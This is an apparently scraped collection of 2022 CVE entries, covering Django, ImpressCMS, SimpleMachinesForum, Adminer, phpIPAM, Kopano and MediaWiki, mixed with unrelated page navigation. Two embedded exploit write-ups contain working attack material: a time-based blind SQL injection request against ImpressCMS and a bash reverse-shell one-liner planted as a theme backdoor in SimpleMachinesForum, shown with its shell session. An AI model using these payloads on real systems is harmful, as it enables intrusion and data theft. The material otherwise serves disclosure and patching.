An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 11 Apr 2022 10:02:56 +0200
From: Mariusz Felisiak <felisiak.mariusz@...il.com>
To: oss-security@...ts.openwall.com
Subject: Django: CVE-2022-28346: Potential SQL injection in
 \`\`QuerySet.annotate()\`\`, \`\`aggregate()\`\`, and \`\`extra()\`\`

https://www.djangoproject.com/weblog/2022/apr/11/security-releases/

In accordance with \`our security release policy
<https://docs.djangoproject.com/en/dev/internals/security/\>\`\_, the 
Django team
is issuing
\`Django 4.0.4 <https://docs.djangoproject.com/en/dev/releases/4.0.4/\>\`\_,
\`Django 3.2.13 
<https://docs.djangoproject.com/en/dev/releases/3.2.13/\>\`\_, and
\`Django 2.2.28 <https://docs.djangoproject.com/en/dev/releases/2.2.28/\>\`\_.
These release addresses the security issues detailed below. We encourage all
users of Django to upgrade as soon as possible.

CVE-2022-28346: Potential SQL injection in \`\`QuerySet.annotate()\`\`, 
\`\`aggregate()\`\`, and \`\`extra()\`\`
====================================================================================================

\`\`QuerySet.annotate()\`\`, \`\`aggregate()\`\`, and \`\`extra()\`\` methods were 
subject to SQL injection in column aliases, using a suitably crafted 
dictionary, with dictionary expansion, as the
\`\`\*\*kwargs\`\` passed to these methods.

Thanks Splunk team: Preston Elder, Jacob Davis, Jacob Moore, Matt 
Hanson, David Briggs, and a security researcher: Danylo Dmytriiev 
(DDV\_UA) for the report.

This issue has severity "high" according to the Django security policy.

Affected supported versions
===========================

\* Django main branch
\* Django 4.0
\* Django 3.2
\* Django 2.2

Resolution
==========

Patches to resolve the issue have been applied to Django's main branch 
and to
the 4.0, 3.2, and 2.2 release branches. The patches may be obtained from the
following changesets.

\* On the \`main branch 
<https://github.com/django/django/commit/93cae5cb2f9a4ef1514cf1a41f714fef08005200\>\`\_\_
\* On the \`4.0 release branch 
<https://github.com/django/django/commit/800828887a0509ad1162d6d407e94d8de7eafc60\>\`\_\_
\* On the \`3.2 release branch 
<https://github.com/django/django/commit/2044dac5c6968441be6f534c4139bcf48c5c7e48\>\`\_\_
\* On the \`2.2 release branch 
<https://github.com/django/django/commit/2c09e68ec911919360d5f8502cefc312f9e03c5d\>\`\_\_

The following releases have been issued:

\* Django 4.0.4 (\`download Django 4.0.4 
<https://www.djangoproject.com/m/releases/4.0/Django-4.0.4.tar.gz\>\`\_ | 
\`4.0.4 checksums 
<https://www.djangoproject.com/m/pgp/Django-4.0.4.checksum.txt\>\`\_)
\* Django 3.2.13 (\`download Django 3.2.13 
<https://www.djangoproject.com/m/releases/3.2/Django-3.2.13.tar.gz\>\`\_ | 
\`3.2.13 checksums 
<https://www.djangoproject.com/m/pgp/Django-3.2.13.checksum.txt\>\`\_)
\* Django 2.2.28 (\`download Django 2.2.28 
<https://www.djangoproject.com/m/releases/2.2/Django-2.2.28.tar.gz\>\`\_ | 
\`2.2.28 checksums 
<https://www.djangoproject.com/m/pgp/Django-2.2.28.checksum.txt\>\`\_)

The PGP key ID used for this release is Mariusz Felisiak: 
\`2EF56372BA48CD1B <https://github.com/felixxm.gpg\>\`\_.

General notes regarding security reporting
==========================================

As always, we ask that potential security issues be reported via
private email to \`\`security@...ngoproject.com\`\`, and not via Django's
Trac instance or the django-developers list. Please see \`our security
policies <https://www.djangoproject.com/security/\>\`\_ for further
information.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-28346: security - Django: CVE-2022-28346: Potential SQL injection in ``QuerySet.annotate()``, ``aggregate()``, and ``extra()``

The Download Manager WordPress plugin before 3.2.34 uses the uniqid php function to generate the master key for a download, allowing an attacker to brute force the key with reasonable resources giving direct download access regardless of role based restrictions or password protections set for the download.

CVE-2022-0828

jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.

CVE-2022-28796

SQL Injection in ImpressCMS 1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3

\# SQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 7th March 2022

\# CVE ID: CVE-2022-26986

\# Confirmed on release 1.4.3

\# Vendor: https://www.impresscms.org/ Download is available at: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3

###############################################

#Step1- Login with Admin Credentials

#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):

POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1

Host: 192.168.56.117

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701

Content-Length: 1011

Origin: http://192.168.56.117

Connection: close

Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1

Cookie: tbl\_SystemMimetype\_sortsel=mimetypeid; tbl\_limitsel=15; tbl\_SystemMimetype\_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3

Upgrade-Insecure-Requests: 1

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="mimetypeid"

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="extension"

bin

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="types"

application/octet-stream

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="name"

Binary File/Linux Executable

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="icms\_page\_before\_form"

http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="op"

addmimetype

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="modify\_button"

Submit

\-----------------------------40629177308912268471540748701--

Vulnerable Payload:

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)

Output:

web application technology: Apache 2.4.52, PHP 7.4.27

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

available databases \[6\]:

\[\*\] impresscms

\[\*\] information\_schema

\[\*\] mysql

\[\*\] performance\_schema

\[\*\] phpmyadmin

\[\*\] test

CVE-2022-26986: 0days/Exploit.txt at main · sartlabs/0days

SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in SimpleMachinesForum 2.1.1

\# Remote Code Execution in SimpleMachinesForum 2.1.1 and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 7th March 2022

\# CVE ID: CVE-2022-26982

\# Confirmed on release 2.1.1

\# Vendor: https://download.simplemachines.org/

\# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!

###############################################

#Step1- Login with Admin Credentials

#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php

#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>

#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page

#Step5- Now click on "Themes and Layout" and you will get the reverse shell:

E.g: Visit http://IP\_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:

listening on \[any\] 4477 ...

connect to \[192.168.56.1\] from (UNKNOWN) \[192.168.56.130\] 41276

bash: cannot set terminal process group (1334): Inappropriate ioctl for device

bash: no job control in this shell

daemon@debian:/opt/bitnami/simplemachinesforum$ whoami

whoami

daemon

daemon@debian:/opt/bitnami/simplemachinesforum$ id

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

daemon@debian:/opt/bitnami/simplemachinesforum$

CVE-2022-26982: 0days/Exploit.txt at main · sartlabs/0days

Improper Access Control in Adminer versions 1.12.0 to 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the remote server by requesting the Adminer to connect to a remote MySQL database.

Adminer up to 4.6.2 found vulnerable, all should upgrade to 4.7.0

**Update 2019-01-20**: the root cause is a protocol flaw in MySQL.

Adminer is a popular PHP tool to administer MySQL and PostgreSQL databases. However, it can be lured to disclose arbitrary files. Attackers can abuse that to fetch passwords for popular apps such as Magento and Wordpress, and gain control of a site’s database.

Exploitation happens in three stages. First, the attacker needs a modified MySQL server, which is altered to send out data import requests to any client that connects.

Second, an attacker needs to find an open adminer.php on the victim system. That is not hard, as many people install it in the root of their site. Once found, the attacker can instruct Adminer to connect to his rigged MySQL server (external connections are actually a feature of Adminer):

Adminer will then connect to the foreign server, login with the credentials, and immediately receive a data import request from the server for a specific file. Here is an example session, where Adminer sends the contents of local.xml (where Magento stores it secret database password) to the attacker-controlled server.

Third stage: as the attacker now has the master password for the victim site, he can use the same Adminer to access the database of the victim. And continue to steal private data or inject a skimmer.

**Abuse in the wild**

Until now there is no documented abuse of this method, but in hindsight we had observed it being used by different Magecart factions at least since October 2018 (although we didn’t understand what was going on back then). The vulnerability was subsequently used to inject payment skimmers on several high-profile stores (government & multinationals).

Because different Magecart factions use it, we suspect that the modified MySQL server is for sale on the dark web.

Via my honeypots and customers I have observed a recent surge in the volume of open Adminer scans. We expect that anyone running an unfixed Adminer will be breached in the coming months.

**The fix?**

We have tested Adminer versions 4.3.1 up to 4.6.2 and found all to be vulnerable. Adminer 4.6.3 was released in June, 2018 and appears safe. It is unclear whether the security flaw was fixed deliberately or by accident, as Adminer does not mention a security release.

We recommend anyone running Adminer to upgrade to the latest version (4.7.0). Also, we urge anyone to protect their database tools via an additional password and/or IP filter. Sometimes perpetrators can obtain your database password by other means, and an open Adminer makes life very easy for them.

CVE-2021-43008: PHP tool 'Adminer' leaks passwords – Sansec

The MapPress Maps for WordPress plugin before 2.73.13 allows a high privileged user to bypass the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS settings and upload arbitrary files to the site through the "ajax_save" function. The file is written relative to the current 's stylesheet directory, and a .php file extension is added. No validation is performed on the content of the file, triggering an RCE vulnerability by uploading a web shell. Further the name parameter is not sanitized, allowing the payload to be uploaded to any directory to which the server has write access.

CVE-2022-0537

Incorrect Authorization in GitHub repository phpipam/phpipam prior to 1.4.6.



**Description**

In phpIPAM 1.4.5, a normal user with the role of User could download or export IP subnets that may contain sensitive information related data such as IP address, IP state, MAC, owner, hostname and device via export-subnet.php endpoint. The bug is the export-subnet.php should verify the user has at least read permission to the subnet it is exporting and it does not.

**Proof of Concept**

Tested version: phpIPAM 1.4.5

Parameter: subnetId

Steps to reproduce:

1 Login as user with the role of User.

2 Go to http://{HOST}/app/subnets/addresses/export-subnet.php?subnetId=1&ip_addr=on&state=on&description=on&hostname=on&firewallAddressObject=on&mac=on&owner=on&switch=on&port=on&note=on&location=on&filename=phpipam_subnet_export.xls

3 We can export any related subnet data by changing subnetId parameter value with any running number such as 1, 2, 3 and so forth.

**Impact**

This vulnerability is capable of Improper Access Control and sensitive data exposure of related party.

CVE-2022-1223: Improper Access Control in phpipam

An issue in provider/libserver/ECKrbAuth.cpp of Kopano-Core v11.0.2.51 contains an issue which allows attackers to authenticate even if the user account or password is expired.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Overview
*   Repositories
*   Packages
*   People

**Pinned**

1.  Read-only mirror of Kopano Core git repo
    
    C++ 50 29
    

3.  Read-only mirror of the Kopano WebApp git repo
    
    JavaScript 19 22
    
4.  Material from the Kopano workshop at the 2021 Univention Summit
    
    Shell 1
    

**Repositories**

Type

Select type

All Public Sources Forks Archived Mirrors Templates

Language

Select language

All C# C++ Go HTML JavaScript PHP Python Shell TypeScript

Sort

Select order

Last updated Name Stars

*   kcc-go Public
    
    This implements a minimal client interfacing with a couple of SOAP methods of a Kopano server.
    
    Go 0 Apache-2.0
    
    3 0 3
    
    Updated Mar 4, 2023
    
*   kopano-webapp Public
    
    Read-only mirror of the Kopano WebApp git repo
    
    JavaScript
    
    19 22 0 5
    
    Updated Mar 2, 2023
    
*   oidc-go Public
    
    Oidc-go is a Go package to provide common helpers to interface with OpenID Connect servers.
    
    Go
    
    2
    
    Apache-2.0
    
    1 0 1
    
    Updated Feb 25, 2023
    
*   kwmserver Public
    
    Kopano Web Meetings Server implements the signaling/channelling server for Kopano Web Meetings
    
    Go
    
    5 3 1 3
    
    Updated Feb 24, 2023
    
*   libkcoidc Public
    
    This project implements a C shared library with a public API to validate Kopano Konnect tokens (JSON Web Tokens).
    
    Go 0 0
    
    2 2
    
    Updated Feb 24, 2023
    
*   kapi Public
    
    Kopano API provides a web service with the endpoints to interface with Kopano via HTTP APIs.
    
    Go
    
    3
    
    0
    
    0 1
    
    Updated Feb 15, 2023
    
*   pubsjs Public
    
    Kopano API Pubs Client Library (pubsjs)
    
    TypeScript 0 MIT 0
    
    0 16
    
    Updated Jan 7, 2023
    
*   kwmjs Public
    
    Kopano Web Meetings Client Library (kwmjs)
    
    TypeScript
    
    1
    
    MIT 0
    
    0 11
    
    Updated Jan 7, 2023
    
*   kpop Public
    
    Kpop is a collection of React UI components and UI uitilites for Kopano Web apps
    
    JavaScript 0 Apache-2.0
    
    1 0 17
    
    Updated Dec 10, 2022
    
*   meet Public
    
    A PWA for doing video meetings
    

**Most used topics**

CVE-2022-26562: Kopano

An issue was discovered in MediaWiki through 1.37.1. ImportPlanValidator.php in the FileImporter extension mishandles the check for edit rights.

*   Edit Task

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Risk Rating

Low

Author Affiliation

Wikimedia Communities

*   Mentions

**Event Timeline**

Restricted Application added a subscriber: Aklapper.

Dylsss renamed this task from FileImporter allows imports to cascade protected files when the importer does not have administartor permissions to FileImporter allows imports to cascade protected files when the importer does not have administrator permissions.

WMDE-Fisch set the point value for this task to 3.

sbassett renamed this task from FileImporter allows imports to cascade protected files when the importer does not have administrator permissions to FileImporter allows imports to cascade protected files when the importer does not have administrator permissions (CVE-2022-28206).

sbassett triaged this task as Low priority.

sbassett changed Author Affiliation from N/A to Wikimedia Communities.

sbassett changed the visibility from "Custom Policy" to "Public (No Login Required)".

sbassett changed Risk Rating from N/A to Low.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-28206: ⚓ T294256 FileImporter allows imports to cascade protected files when the importer does not have administrator permissions (CVE-2022-28206)

Tag

#php